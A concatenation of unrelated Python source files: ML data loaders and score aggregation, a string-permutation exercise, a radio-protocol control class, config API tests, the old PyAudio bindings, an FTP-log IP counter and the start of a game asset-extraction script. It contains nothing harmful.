#get_train_sampler = lambda d: BatchSampler(RandomSampler(d), kwargs['batch_size'], False) get_train_sampler = lambda d: IdentityBatchSampler(d, kwargs['batch_size'], kwargs['num_instances']) get_test_sampler = lambda d: BatchSampler(SequentialSampler(d), kwargs['batch_size'], False) elif sample == 'pair': get_train_sampler = lambda d: PairBatchSampler(d, kwargs['batch_size']) get_test_sampler = lambda d: BatchSampler(SequentialSampler(d), kwargs['batch_size'], False) else: raise Exception('Unknown sampling: {}'.format(sampling)) trainloader = DataLoader(trainset, batch_sampler=get_train_sampler(trainset), num_workers=8) valloader = DataLoader(valset, batch_sampler=get_test_sampler(valset), num_workers=8) return trainloader, valloader import os from allennlp.common import Params import myutils udPath = 'data/ud-treebanks-v' + myutils.UDversion + '/' UDSETS = [] for UDdir in os.listdir(udPath): if not UDdir.startswith("UD"): continue _, _, test = myutils.getTrainDevTest(udPath + UDdir) if test != '' and myutils.hasColumn(test, 1): UDSETS.append(UDdir) outDir = 'preds/' for setting in ['self', 'concat.smoothed', 'sepDec.smoothed', 'datasetEmbeds.smoothed', 'concat']: scores = [] for UDdir in UDSETS: scores = [] for seed in myutils.seeds: if setting == 'self': output = 'preds/self.' + UDdir else: output = 'preds/fullUD' + setting + '.' + str(seed) + '.' + UDdir output = output + '.test.' + str(seed) + '.conllu.eval' if os.path.isfile(output) and os.stat(output).st_size != 0 and os.stat(output).st_size < 100: scores.append(float(open(output).readline().strip().split()[-1])) else: scores.append(0.0) print("NF", output) scores.append(sum(scores)/len(scores)) print(setting + ' & ' + str(round(sum(scores)/len(scores), 2))) print() glue = Params.from_file('configs/glue.json') for setting in ['glue', 'glue.smoothSampling', 'glue.single']: scores = [] for task in glue: if task == 'wnli': continue output = outDir + setting + '.' + task + '.eval' if os.path.isfile(output): score = float(open(output).readline().split()[0]) else: score = 0.0 scores.append(score) print(setting + ' & ' + str(round(sum(100 * scores)/len(scores), 2))) '''' Problem: Determine if two strings are permutations. Assumptions: String is composed of lower 128 ASCII characters. Capitalization matters. ''' def isPerm(s1, s2): if len(s1) != len(s2): return False arr1 = [0] * 128 arr2 = [0] * 128 for c, d in zip(s1, s2): arr1[ord(c)] += 1 arr2[ord(d)] += 1 for i in xrange(len(arr1)): if arr1[i] != arr2[i]: return False return True def test(): s1 = "read" s2 = "dear" assert isPerm(s1, s2) == True s1 = "read" s2 = "red" assert isPerm(s1, s2) == False s1 = "read" s2 = "race" assert isPerm(s1, s2) == False s1 = "Read" s2 = "read" assert isPerm(s1, s2) == False print("Test passed") test() utils/helpers.py def progress_bar_alive(): """generator progress bar alive status""" options, i = ["|", "/", "─", "\\"], 0 while True: yield options[i] i = (i + 1) % 4 d7a/sp/autoscaling_ctrl.py # # Copyright (c) 2015-2021 University of Antwerp, Aloxy NV. # # This file is part of pyd7a. # See https://github.com/Sub-IoT/pyd7a for further info. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # author: <> # class implementation of autoscaling control from enum import Enum from d7a.support.schema import Validatable, Types class AutoscalingCtrl(Validatable): SCHEMA = [{ "toggle": Types.BOOLEAN(), "rxlev" : Types.BOOLEAN(), "on" : Types.BOOLEAN() }] def __init__(self, toggle=False, rxlev=False, on=False): self.toggle = toggle self.rxlev = rxlev self.on = on super(AutoscalingCtrl, self).__init__() def __iter__(self): byte = 0 if self.on: byte |= 1 # b0 if self.rxlev: byte |= 1 << 1 # b1 if self.toggle: byte |= 1 << 2 # b2 yield byte @staticmethod def parse(s): _rfu = s.read("uint:5") toggle = s.read("bool") rxlev = s.read("bool") on = s.read("bool") return AutoscalingCtrl(toggle=toggle, rxlev=rxlev, on=on) def __str__(self): return str(self.as_dict())"""High-level API tests on subarrays.""" import os import pytest import ska_sdp_config # pylint: disable=missing-docstring,redefined-outer-name PREFIX = "/__test_subarray" # pylint: disable=W0212 @pytest.fixture(scope="session") def cfg(): host = os.getenv("SDP_TEST_HOST", "127.0.0.1") with ska_sdp_config.Config(global_prefix=PREFIX, host=host) as cfg: cfg.backend.delete(PREFIX, must_exist=False, recursive=True) yield cfg cfg.backend.delete(PREFIX, must_exist=False, recursive=True) def test_subarray_list(cfg): subarray1_id = "01" subarray2_id = "02" # Check subarray list is empty for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == [] # Create first subarray for txn in cfg.txn(): txn.create_subarray(subarray1_id, {}) # Check subarray list has entry for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == [subarray1_id] # Create second subarray for txn in cfg.txn(): txn.create_subarray(subarray2_id, {}) # Check subarray list has both entries for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == sorted([subarray1_id, subarray2_id]) def test_subarray_create_update(cfg): subarray_id = "03" state1 = { "sbi_id": "sbi-test-20200727-00000", "state": "ON", "obs_state": "READY", "scan_type": "science", "scan_id": None, } state2 = { "sbi_id": "sbi-test-20200727-00000", "state": "ON", "obs_state": "SCANNING", "scan_type": "science", "scan_id": 1, } # Subarray has not been created, so should return None for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state is None # Create subarray as state1 for txn in cfg.txn(): txn.create_subarray(subarray_id, state1) # Read subarray and check it is equal to state1 for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state == state1 # Trying to recreate should raise a collision exception for txn in cfg.txn(): with pytest.raises(ska_sdp_config.ConfigCollision): txn.create_subarray(subarray_id, state1) # Update subarray to state2 for txn in cfg.txn(): txn.update_subarray(subarray_id, state2) # Read subarray and check it is equal to state2 for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state == state2 if __name__ == "__main__": pytest.main() 0 # PyAudio : Python Bindings for PortAudio. # Copyright (c) 2006-2010 # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ PyAudio : Python Bindings for PortAudio v19. **These bindings only support PortAudio blocking mode.** :var PaSampleFormat: A list of all PortAudio ``PaSampleFormat`` value constants. See: `paInt32`, `paInt24`, `paInt16`, `paInt8`, and `paUInt8`. :var PaHostApiTypeId: A list of all PortAudio ``PaHostApiTypeId`` constants. See: `paInDevelopment`, `paDirectSound`, `paMME`, `paASIO`, `paSoundManager`, `paCoreAudio`, `paOSS`, `paALSA`, `paAL`, *et al...* :var PaErrorCode: A list of all PortAudio ``PaErrorCode`` constants. Typically, error code constants are included in Python exception objects (as the second argument). See: `paNoError`, `paNotInitialized`, `paUnanticipatedHostError`, *et al...* :group PortAudio Constants: PaSampleFormat, PaHostApiTypeId, PaErrorCode :group PaSampleFormat Values: paFloat32, paInt32, paInt24, paInt16, paInt8, paUInt8, paCustomFormat :group PaHostApiTypeId Values: paInDevelopment, paDirectSound, paMME, paASIO, paSoundManager, paCoreAudio, paOSS, paALSA paAL, paBeOS, paWDMKS, paJACK, paWASAPI, paNoDevice :group PaErrorCode Values: paNoError, paNotInitialized, paUnanticipatedHostError, paInvalidChannelCount, paInvalidSampleRate, paInvalidDevice, paInvalidFlag, paSampleFormatNotSupported, paBadIODeviceCombination, paInsufficientMemory, paBufferTooBig, paBufferTooSmall, paNullCallback, paBadStreamPtr, paTimedOut, paInternalError, paDeviceUnavailable, paIncompatibleHostApiSpecificStreamInfo, paStreamIsStopped, paStreamIsNotStopped, paInputOverflowed, paOutputUnderflowed, paHostApiNotFound, paInvalidHostApi, paCanNotReadFromACallbackStream, paCanNotWriteToACallbackStream, paCanNotReadFromAnOutputOnlyStream, paCanNotWriteToAnInputOnlyStream, paIncompatibleStreamHostApi :group Stream Conversion Convenience Functions: get_sample_size, get_format_from_width :group PortAudio version: get_portaudio_version, get_portaudio_version_text :sort: PaSampleFormat, PaHostApiTypeId, PaErrorCode :sort: PortAudio Constants, PaSampleFormat Values, PaHostApiTypeId Values, PaErrorCode Values """ __author__ = "" __version__ = "0.2.4" __docformat__ = "restructuredtext en" import sys # attempt to import PortAudio try: import _portaudio as pa except ImportError: print "Please build and install the PortAudio Python bindings first." sys.exit(-1) # Try to use Python 2.4's built in `set' try: a = set() del a except NameError: from sets import Set as set ############################################################ # GLOBALS ############################################################ ##### PaSampleFormat Sample Formats ##### paFloat32 = pa.paFloat32 paInt32 = pa.paInt32 paInt24 = pa.paInt24 paInt16 = pa.paInt16 paInt8 = pa.paInt8 paUInt8 = pa.paUInt8 paCustomFormat = pa.paCustomFormat # group them together for epydoc PaSampleFormat = ['paFloat32', 'paInt32', 'paInt24', 'paInt16', 'paInt8', 'paUInt8', 'paCustomFormat'] ###### HostAPI TypeId ##### paInDevelopment = pa.paInDevelopment paDirectSound = pa.paDirectSound paMME = pa.paMME paASIO = pa.paASIO paSoundManager = pa.paSoundManager paCoreAudio = pa.paCoreAudio paOSS = pa.paOSS paALSA = pa.paALSA paAL = pa.paAL paBeOS = pa.paBeOS paWDMKS = pa.paWDMKS paJACK = pa.paJACK paWASAPI = pa.paWASAPI paNoDevice = pa.paNoDevice # group them together for epydoc PaHostApiTypeId = ['paInDevelopment', 'paDirectSound', 'paMME', 'paASIO', 'paSoundManager', 'paCoreAudio', 'paOSS', 'paALSA', 'paAL', 'paBeOS', 'paWDMKS', 'paJACK', 'paWASAPI', 'paNoDevice'] ###### portaudio error codes ##### paNoError = pa.paNoError paNotInitialized = pa.paNotInitialized paUnanticipatedHostError = pa.paUnanticipatedHostError paInvalidChannelCount = pa.paInvalidChannelCount paInvalidSampleRate = pa.paInvalidSampleRate paInvalidDevice = pa.paInvalidDevice paInvalidFlag = pa.paInvalidFlag paSampleFormatNotSupported = pa.paSampleFormatNotSupported paBadIODeviceCombination = pa.paBadIODeviceCombination paInsufficientMemory = pa.paInsufficientMemory paBufferTooBig = pa.paBufferTooBig paBufferTooSmall = pa.paBufferTooSmall paNullCallback = pa.paNullCallback paBadStreamPtr = pa.paBadStreamPtr paTimedOut = pa.paTimedOut paInternalError = pa.paInternalError paDeviceUnavailable = pa.paDeviceUnavailable paIncompatibleHostApiSpecificStreamInfo = pa.paIncompatibleHostApiSpecificStreamInfo paStreamIsStopped = pa.paStreamIsStopped paStreamIsNotStopped = pa.paStreamIsNotStopped paInputOverflowed = pa.paInputOverflowed paOutputUnderflowed = pa.paOutputUnderflowed paHostApiNotFound = pa.paHostApiNotFound paInvalidHostApi = pa.paInvalidHostApi paCanNotReadFromACallbackStream = pa.paCanNotReadFromACallbackStream paCanNotWriteToACallbackStream = pa.paCanNotWriteToACallbackStream paCanNotReadFromAnOutputOnlyStream = pa.paCanNotReadFromAnOutputOnlyStream paCanNotWriteToAnInputOnlyStream = pa.paCanNotWriteToAnInputOnlyStream paIncompatibleStreamHostApi = pa.paIncompatibleStreamHostApi # group them together for epydoc PaErrorCode = ['paNoError', 'paNotInitialized', 'paUnanticipatedHostError', 'paInvalidChannelCount', 'paInvalidSampleRate', 'paInvalidDevice', 'paInvalidFlag', 'paSampleFormatNotSupported', 'paBadIODeviceCombination', 'paInsufficientMemory', 'paBufferTooBig', 'paBufferTooSmall', 'paNullCallback', 'paBadStreamPtr', 'paTimedOut', 'paInternalError', 'paDeviceUnavailable', 'paIncompatibleHostApiSpecificStreamInfo', 'paStreamIsStopped', 'paStreamIsNotStopped', 'paInputOverflowed', 'paOutputUnderflowed', 'paHostApiNotFound', 'paInvalidHostApi', 'paCanNotReadFromACallbackStream', 'paCanNotWriteToACallbackStream', 'paCanNotReadFromAnOutputOnlyStream', 'paCanNotWriteToAnInputOnlyStream', 'paIncompatibleStreamHostApi'] ############################################################ # Convenience Functions ############################################################ def get_sample_size(format): """ Returns the size (in bytes) for the specified sample `format` (a `PaSampleFormat` constant). :param `format`: PortAudio sample format constant `PaSampleFormat`. :raises ValueError: Invalid specified `format`. :rtype: int """ return pa.get_sample_size(format) def get_format_from_width(width, unsigned = True): """ Returns a PortAudio format constant for the specified `width`. :param `width`: The desired sample width in bytes (1, 2, 3, or 4) :param `unsigned`: For 1 byte width, specifies signed or unsigned format. :raises ValueError: for invalid `width` :rtype: `PaSampleFormat` """ if width == 1: if unsigned: return paUInt8 else: return paInt8 elif width == 2: return paInt16 elif width == 3: return paInt24 elif width == 4: return paFloat32 else: raise ValueError, "Invalid width: %d" % width ############################################################ # Versioning ############################################################ def get_portaudio_version(): """ Returns portaudio version. :rtype: str """ return pa.get_version() def get_portaudio_version_text(): """ Returns PortAudio version as a text string. :rtype: str """ return pa.get_version_text() ############################################################ # Wrapper around _portaudio Stream (Internal) ############################################################ # Note: See PyAudio class below for main export. class Stream: """ PortAudio Stream Wrapper. Use `PyAudio.open` to make a new `Stream`. :group Opening and Closing: __init__, close :group Stream Info: get_input_latency, get_output_latency, get_time, get_cpu_load :group Stream Management: start_stream, stop_stream, is_active, is_stopped :group Input Output: write, read, get_read_available, get_write_available """ def __init__(self, PA_manager, rate, channels, format, input = False, output = False, input_device_index = None, output_device_index = None, frames_per_buffer = 1024, start = True, input_host_api_specific_stream_info = None, output_host_api_specific_stream_info = None): """ Initialize a stream; this should be called by `PyAudio.open`. A stream can either be input, output, or both. :param `PA_manager`: A reference to the managing `PyAudio` instance :param `rate`: Sampling rate :param `channels`: Number of channels :param `format`: Sampling size and format. See `PaSampleFormat`. :param `input`: Specifies whether this is an input stream. Defaults to False. :param `output`: Specifies whether this is an output stream. Defaults to False. :param `input_device_index`: Index of Input Device to use. Unspecified (or None) uses default device. Ignored if `input` is False. :param `output_device_index`: Index of Output Device to use. Unspecified (or None) uses the default device. Ignored if `output` is False. :param `frames_per_buffer`: Specifies the number of frames per buffer. :param `start`: Start the stream running immediately. Defaults to True. In general, there is no reason to set this to false. :param `input_host_api_specific_stream_info`: Specifies a host API specific stream information data structure for input. See `PaMacCoreStreamInfo`. :param `output_host_api_specific_stream_info`: Specifies a host API specific stream information data structure for output. See `PaMacCoreStreamInfo`. :raise ValueError: Neither input nor output are set True. """ # no stupidity allowed if not (input or output): raise ValueError, \ "Must specify an input or output stream." # remember parent self._parent = PA_manager # remember if we are an: input, output (or both) self._is_input = input self._is_output = output # are we running? self._is_running = start # remember some parameters self._rate = rate self._channels = channels self._format = format self._frames_per_buffer = frames_per_buffer arguments = { 'rate' : rate, 'channels' : channels, 'format' : format, 'input' : input, 'output' : output, 'input_device_index' : input_device_index, 'output_device_index' : output_device_index, 'frames_per_buffer' : frames_per_buffer} if input_host_api_specific_stream_info: _l = input_host_api_specific_stream_info arguments[ 'input_host_api_specific_stream_info' ] = _l._get_host_api_stream_object() if output_host_api_specific_stream_info: _l = output_host_api_specific_stream_info arguments[ 'output_host_api_specific_stream_info' ] = _l._get_host_api_stream_object() # calling pa.open returns a stream object self._stream = pa.open(**arguments) self._input_latency = self._stream.inputLatency self._output_latency = self._stream.outputLatency if self._is_running: pa.start_stream(self._stream) def close(self): """ Close the stream """ pa.close(self._stream) self._is_running = False self._parent._remove_stream(self) ############################################################ # Stream Info ############################################################ def get_input_latency(self): """ Return the input latency. :rtype: float """ return self._stream.inputLatency def get_output_latency(self): """ Return the input latency. :rtype: float """ return self._stream.outputLatency def get_time(self): """ Return stream time. :rtype: float """ return pa.get_stream_time(self._stream) def get_cpu_load(self): """ Return the CPU load. (Note: this is always 0.0 for the blocking API.) :rtype: float """ return pa.get_stream_cpu_load(self._stream) ############################################################ # Stream Management ############################################################ def start_stream(self): """ Start the stream. """ if self._is_running: return pa.start_stream(self._stream) self._is_running = True def stop_stream(self): """ Stop the stream. Once the stream is stopped, one may not call write or read. However, one may call start_stream to resume the stream. """ if not self._is_running: return pa.stop_stream(self._stream) self._is_running = False def is_active(self): """ Returns whether the stream is active. :rtype: bool """ return pa.is_stream_active(self._stream) def is_stopped(self): """ Returns whether the stream is stopped. :rtype: bool """ return pa.is_stream_stopped(self._stream) ############################################################ # Reading/Writing ############################################################ def write(self, frames, num_frames = None, exception_on_underflow = False): """ Write samples to the stream. :param `frames`: The frames of data. :param `num_frames`: The number of frames to write. Defaults to None, in which this value will be automatically computed. :param `exception_on_underflow`: Specifies whether an exception should be thrown (or silently ignored) on buffer underflow. Defaults to False for improved performance, especially on slower platforms. :raises IOError: if the stream is not an output stream or if the write operation was unsuccessful. :rtype: `None` """ if not self._is_output: raise IOError("Not output stream", paCanNotWriteToAnInputOnlyStream) if num_frames == None: # determine how many frames to read width = get_sample_size(self._format) num_frames = len(frames) / (self._channels * width) #print len(frames), self._channels, self._width, num_frames pa.write_stream(self._stream, frames, num_frames, exception_on_underflow) def read(self, num_frames): """ Read samples from the stream. :param `num_frames`: The number of frames to read. :raises IOError: if stream is not an input stream or if the read operation was unsuccessful. :rtype: str """ if not self._is_input: raise IOError("Not input stream", paCanNotReadFromAnOutputOnlyStream) return pa.read_stream(self._stream, num_frames) def get_read_available(self): """ Return the number of frames that can be read without waiting. :rtype: int """ return pa.get_stream_read_available(self._stream) def get_write_available(self): """ Return the number of frames that can be written without waiting. :rtype: int """ return pa.get_stream_write_available(self._stream) ############################################################ # Main Export ############################################################ class PyAudio: """ Python interface to PortAudio. Provides methods to: - initialize and terminate PortAudio - open and close streams - query and inspect the available PortAudio Host APIs - query and inspect the available PortAudio audio devices Use this class to open and close streams. :group Stream Management: open, close :group Host API: get_host_api_count, get_default_host_api_info, get_host_api_info_by_type, get_host_api_info_by_index, get_device_info_by_host_api_device_index :group Device API: get_device_count, is_format_supported, get_default_input_device_info, get_default_output_device_info, get_device_info_by_index :group Stream Format Conversion: get_sample_size, get_format_from_width """ ############################################################ # Initialization and Termination ############################################################ def __init__(self): """ Initialize PortAudio. """ pa.initialize() self._streams = set() def terminate(self): """ Terminate PortAudio. :attention: Be sure to call this method for every instance of this object to release PortAudio resources. """ for stream in self._streams: stream.close() self._streams = set() pa.terminate() ############################################################ # Stream Format ############################################################ def get_sample_size(self, format): """ Returns the size (in bytes) for the specified sample `format` (a `PaSampleFormat` constant). :param `format`: Sample format constant (`PaSampleFormat`). :raises ValueError: Invalid specified `format`. :rtype: int """ return pa.get_sample_size(format) def get_format_from_width(self, width, unsigned = True): """ Returns a PortAudio format constant for the specified `width`. :param `width`: The desired sample width in bytes (1, 2, 3, or 4) :param `unsigned`: For 1 byte width, specifies signed or unsigned format. :raises ValueError: for invalid `width` :rtype: `PaSampleFormat` """ if width == 1: if unsigned: return paUInt8 else: return paInt8 elif width == 2: return paInt16 elif width == 3: return paInt24 elif width == 4: return paFloat32 else: raise ValueError, "Invalid width: %d" % width ############################################################ # Stream Factory ############################################################ def open(self, *args, **kwargs): """ Open a new stream. See constructor for `Stream.__init__` for parameter details. :returns: `Stream` """ stream = Stream(self, *args, **kwargs) self._streams.add(stream) return stream def close(self, stream): """ Close a stream. Typically use `Stream.close` instead. :param `stream`: An instance of the `Stream` object. :raises ValueError: if stream does not exist. """ if stream not in self._streams: raise ValueError, "Stream `%s' not found" % str(stream) stream.close() def _remove_stream(self, stream): """ Internal method. Removes a stream. :param `stream`: An instance of the `Stream` object. """ if stream in self._streams: self._streams.remove(stream) ############################################################ # Host API Inspection ############################################################ def get_host_api_count(self): """ Return the number of PortAudio Host APIs. :rtype: int """ return pa.get_host_api_count() def get_default_host_api_info(self): """ Return a dictionary containing the default Host API parameters. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :raises IOError: if no default input device available :rtype: dict """ defaultHostApiIndex = pa.get_default_host_api() return self.get_host_api_info_by_index(defaultHostApiIndex) def get_host_api_info_by_type(self, host_api_type): """ Return a dictionary containing the Host API parameters for the host API specified by the `host_api_type`. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :param `host_api_type`: The desired Host API (`PaHostApiTypeId` constant). :raises IOError: for invalid `host_api_type` :rtype: dict """ index = pa.host_api_type_id_to_host_api_index(host_api_type) return self.get_host_api_info_by_index(index) def get_host_api_info_by_index(self, host_api_index): """ Return a dictionary containing the Host API parameters for the host API specified by the `host_api_index`. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :param `host_api_index`: The host api index. :raises IOError: for invalid `host_api_index` :rtype: dict """ return self._make_host_api_dictionary( host_api_index, pa.get_host_api_info(host_api_index) ) def get_device_info_by_host_api_device_index(self, host_api_index, host_api_device_index): """ Return a dictionary containing the Device parameters for a given Host API's n'th device. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :param `host_api_index`: The Host API index number. :param `host_api_device_index`: The *n* 'th device of the host API. :raises IOError: for invalid indices :rtype: dict """ long_method_name = pa.host_api_device_index_to_device_index device_index = long_method_name(host_api_index, host_api_device_index) return self.get_device_info_by_index(device_index) def _make_host_api_dictionary(self, index, host_api_struct): """ Internal method to create Host API dictionary that mirrors PortAudio's ``PaHostApiInfo`` structure. :rtype: dict """ return {'index' : index, 'structVersion' : host_api_struct.structVersion, 'type' : host_api_struct.type, 'name' : host_api_struct.name, 'deviceCount' : host_api_struct.deviceCount, 'defaultInputDevice' : host_api_struct.defaultInputDevice, 'defaultOutputDevice' : host_api_struct.defaultOutputDevice} ############################################################ # Device Inspection ############################################################ def get_device_count(self): """ Return the number of PortAudio Host APIs. :rtype: int """ return pa.get_device_count() def is_format_supported(self, rate, input_device = None, input_channels = None, input_format = None, output_device = None, output_channels = None, output_format = None): """ Check to see if specified device configuration is supported. Returns True if the configuration is supported; throws a ValueError exception otherwise. :param `rate`: Specifies the desired rate (in Hz) :param `input_device`: The input device index. Specify `None` (default) for half-duplex output-only streams. :param `input_channels`: The desired number of input channels. Ignored if `input_device` is not specified (or `None`). :param `input_format`: PortAudio sample format constant defined in this module :param `output_device`: The output device index. Specify `None` (default) for half-duplex input-only streams. :param `output_channels`: The desired number of output channels. Ignored if `input_device` is not specified (or `None`). :param `output_format`: PortAudio sample format constant (`PaSampleFormat`). :rtype: bool :raises ValueError: tuple containing: (error string, PortAudio error code `PaErrorCode`). """ if input_device == None and output_device == None: raise ValueError("must specify stream format for input, " +\ "output, or both", paInvalidDevice); kwargs = {} if input_device != None: kwargs['input_device'] = input_device kwargs['input_channels'] = input_channels kwargs['input_format'] = input_format if output_device != None: kwargs['output_device'] = output_device kwargs['output_channels'] = output_channels kwargs['output_format'] = output_format return pa.is_format_supported(rate, **kwargs) def get_default_input_device_info(self): """ Return the default input Device parameters as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :raises IOError: No default input device available. :rtype: dict """ device_index = pa.get_default_input_device() return self.get_device_info_by_index(device_index) def get_default_output_device_info(self): """ Return the default output Device parameters as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :raises IOError: No default output device available. :rtype: dict """ device_index = pa.get_default_output_device() return self.get_device_info_by_index(device_index) def get_device_info_by_index(self, device_index): """ Return the Device parameters for device specified in `device_index` as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :param `device_index`: The device index. :raises IOError: Invalid `device_index`. :rtype: dict """ return self._make_device_info_dictionary( device_index, pa.get_device_info(device_index) ) def _make_device_info_dictionary(self, index, device_info): """ Internal method to create Device Info dictionary that mirrors PortAudio's ``PaDeviceInfo`` structure. :rtype: dict """ return {'index' : index, 'structVersion' : device_info.structVersion, 'name' : device_info.name, 'hostApi' : device_info.hostApi, 'maxInputChannels' : device_info.maxInputChannels, 'maxOutputChannels' : device_info.maxOutputChannels, 'defaultLowInputLatency' : device_info.defaultLowInputLatency, 'defaultLowOutputLatency' : device_info.defaultLowOutputLatency, 'defaultHighInputLatency' : device_info.defaultHighInputLatency, 'defaultHighOutputLatency' : device_info.defaultHighOutputLatency, 'defaultSampleRate' : device_info.defaultSampleRate } ###################################################################### # Host Specific Stream Info ###################################################################### try: paMacCoreStreamInfo = pa.paMacCoreStreamInfo except AttributeError: pass else: class PaMacCoreStreamInfo: """ Mac OS X-only: PaMacCoreStreamInfo is a PortAudio Host API Specific Stream Info data structure for specifying Mac OS X-only settings. Instantiate this class (if desired) and pass the instance as the argument in `PyAudio.open` to parameters ``input_host_api_specific_stream_info`` or ``output_host_api_specific_stream_info``. (See `Stream.__init__`.) :note: Mac OS X only. :group Flags (constants): paMacCoreChangeDeviceParameters, paMacCoreFailIfConversionRequired, paMacCoreConversionQualityMin, paMacCoreConversionQualityMedium, paMacCoreConversionQualityLow, paMacCoreConversionQualityHigh, paMacCoreConversionQualityMax, paMacCorePlayNice, paMacCorePro, paMacCoreMinimizeCPUButPlayNice, paMacCoreMinimizeCPU :group Settings: get_flags, get_channel_map """ paMacCoreChangeDeviceParameters = pa.paMacCoreChangeDeviceParameters paMacCoreFailIfConversionRequired = pa.paMacCoreFailIfConversionRequired paMacCoreConversionQualityMin = pa.paMacCoreConversionQualityMin paMacCoreConversionQualityMedium = pa.paMacCoreConversionQualityMedium paMacCoreConversionQualityLow = pa.paMacCoreConversionQualityLow paMacCoreConversionQualityHigh = pa.paMacCoreConversionQualityHigh paMacCoreConversionQualityMax = pa.paMacCoreConversionQualityMax paMacCorePlayNice = pa.paMacCorePlayNice paMacCorePro = pa.paMacCorePro paMacCoreMinimizeCPUButPlayNice = pa.paMacCoreMinimizeCPUButPlayNice paMacCoreMinimizeCPU = pa.paMacCoreMinimizeCPU def __init__(self, flags = None, channel_map = None): """ Initialize with flags and channel_map. See PortAudio documentation for more details on these parameters; they are passed almost verbatim to the PortAudio library. :param `flags`: paMacCore* flags OR'ed together. See `PaMacCoreStreamInfo`. :param `channel_map`: An array describing the channel mapping. See PortAudio documentation for usage. """ kwargs = {"flags" : flags, "channel_map" : channel_map} if flags == None: del kwargs["flags"] if channel_map == None: del kwargs["channel_map"] self._paMacCoreStreamInfo = paMacCoreStreamInfo(**kwargs) def get_flags(self): """ Return the flags set at instantiation. :rtype: int """ return self._paMacCoreStreamInfo.flags def get_channel_map(self): """ Return the channel map set at instantiation. :rtype: tuple or None """ return self._paMacCoreStreamInfo.channel_map def _get_host_api_stream_object(self): """ Private method. """ return self._paMacCoreStreamInfo 1-10 #!/usr/bin/env python3 import sys import re def main(): content = open(sys.argv[1], 'r').read() regular_expression = r"(?<=EST;)[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+(?=;.+FTP;Request)" all_matches_li = re.findall(regular_expression, content) # print(all_matches_li) ip_dictionary = {} for ip in all_matches_li: if ip in ip_dictionary: ip_dictionary[ip] += 1 else: ip_dictionary[ip] = 1 # print(ip_dictionary) def compare_value(ip): return ip_dictionary[ip] sorted_dictionary = sorted(ip_dictionary, key=compare_value, reverse=True) # print(sorted_dictionary) for ip in sorted_dictionary[0:5]: print(ip, ip_dictionary[ip]) if __name__ == '__main__': main()#This script runs through all toc files it can find and uses that information to extract the files to a target directory. #Often the assets are actually stored in cascat archives (the sbtoc knows where to search in the cascat), which is taken care of too. #The script does not overwrite existing files (mainly because 10 sbtocs pointing at the same asset in the cascat would make the extraction time unbearable). import dbo import noncas import ebx import payload import cas import das import os from struct import pack,unpack import res #Adjust paths here. #do yourself a favor and don't dump into the Users folder (or it might complain about permission) gameDirectory = r"D:\Games\OriginGames\Need for Speed(TM) Rivals" targetDirectory = r"E:\GameRips\NFS\NFSR\pc\dump" ##################################### ##################################### def dump(tocPath,baseTocPath,outPath): """Take the filename of a toc and dump all files to the targetFolder.""" #Depending on how you look at it, there can be up to 2*(3*3+1)=20 different cases: # The toc has a cas flag which means all assets are stored in the cas archives. => 2 options # Each bundle has either a delta or base flag, or no flag at all. => 3 options # Each file in the bundle is one of three types: ebx/res/chunks => 3 options # The toc itself contains chunks. => 1 option # #Simplify things by ignoring base bundles (they just state that the unpatched bundle is used), #which is alright, as the user needs to dump the unpatched files anyway. # #Additionally, add some common fields to the ebx/res/chunks entries so they can be treated the same. #=> 6 cases. toc=dbo.readToc(tocPath) if not (toc.get("bundles") or toc.get("chunks")): return #there's nothing to extract (the sb might not even exist) sbPath=tocPath[:-3]+"sb" sb=open(sbPath,"rb") chunkPathToc=os.path.join(outPath,"chunks") bundlePath=os.path.join(outPath,"bundles") ebxPath=os.path.join(bundlePath,"ebx") resPath=os.path.join(bundlePath,"res") chunkPath=os.path.join(bundlePath,"chunks") ###read the bundle depending on the four types (+cas+delta, +cas-delta, -cas+delta, -cas-delta) and choose the right function to write the payload if toc.get("cas"): for tocEntry in toc.get("bundles"): #id offset size, size is redundant if tocEntry.get("base"): continue #Patched bundle. However, use the unpatched bundle because no file was patched at all. sb.seek(tocEntry.get("offset")) bundle=dbo.DbObject(sb) #pick the right function if tocEntry.get("delta"): writePayload=payload.casPatchedBundlePayload else: writePayload=payload.casBundlePayload for entry in bundle.get("ebx",list()): #name sha1 size originalSize path=os.path.join(ebxPath,entry.get("name")+".ebx") if writePayload(entry,path,False): ebx.addEbxGuid(path,ebxPath) for entry in 